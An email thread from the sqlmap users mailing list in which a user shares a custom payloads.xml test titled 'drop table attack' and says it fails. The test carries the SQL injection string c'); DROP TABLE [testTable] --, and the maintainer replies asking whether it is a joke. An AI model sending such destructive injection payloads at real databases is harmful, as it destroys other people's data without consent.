So you made a "DROP TABLE" payload :))
I am not sure if this is a joke or for real?!
Kind regards,
Miroslav Stampar
On Tue, Jan 21, 2014 at 10:24 AM, l.g. <ibozoo...@googlemail.com> wrote:
> <l.g> writes:
>
> >
> > hi! In payloads.xml I substituted this snippet:
> >
> > - <!-- End of AGAINST boolean full-text search boundaries
> > -->
> > - <!-- Boolean-based blind tests - WHERE/HAVING clause
> > -->
> > - <test>
> > - <test>
> > <title>drop table attack</title>
> > <stype>2</stype>
> > <level>1</level>
> > <risk>5</risk>
> > <clause>1</clause>
> > <where>1</where>
> > <vector>c'); DROP TABLE [testTable] --</vector>
> > - <request>
> > <payload>c'); DROP TABLE [testTable] --</payload>
> > <comment>--</comment>
> > </request>
> > - <response>
> > <grep>object</grep>
> > </response>
> > - <details>
> > <dbms>Microsoft SQL Server</dbms>
> > </details>
> > </test>
> > - <test>
> > <title>AND boolean-based blind - WHERE or HAVING clause</title>
> > <stype>1</stype>
> > <level>1</level>
> > <risk>1</risk>
> > <clause>1</clause>
> > <where>1</where>
> > <vector>AND [INFERENCE]</vector>
> > - <request>
> > <payload>AND [RANDNUM]=[RANDNUM]</payload>
> > </request>
> > - <response>
> > <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
> > </response>
> > </test>
> >
> > with this:
> >
> > - <!-- End of AGAINST boolean full-text search boundaries
> > -->
> > - <!-- Boolean-based blind tests - WHERE/HAVING clause
> > -->
> > - <test>
> > - <test>
> > <title>AND boolean-based blind - WHERE or HAVING clause</title>
> > <stype>1</stype>
> > <level>1</level>
> > <risk>1</risk>
> > <clause>1</clause>
> > <where>1</where>
> > <vector>AND [INFERENCE]</vector>
> > - <request>
> > <payload>AND [RANDNUM]=[RANDNUM]</payload>
> > </request>
> > - <response>
> > <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
> > </response>
> > </test>
> >
> > but it doesn't work..
> > thank you
> >
> Sorry! I inverted the snippets in the previous post..
>
> this is what I added to std xml:
>
> - <test>
> <title>drop table attack</title>
> <stype>2</stype>
> <level>1</level>
> <risk>5</risk>
> <clause>1</clause>
> <where>1</where>
> <vector>c'); DROP TABLE [testTable] --</vector>
> - <request>
> <payload>c'); DROP TABLE [testTable] --</payload>
> <comment>--</comment>
> </request>
> - <response>
> <grep>object</grep>
> </response>
> - <details>
> <dbms>Microsoft SQL Server</dbms>
> </details>
> </test>
>
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm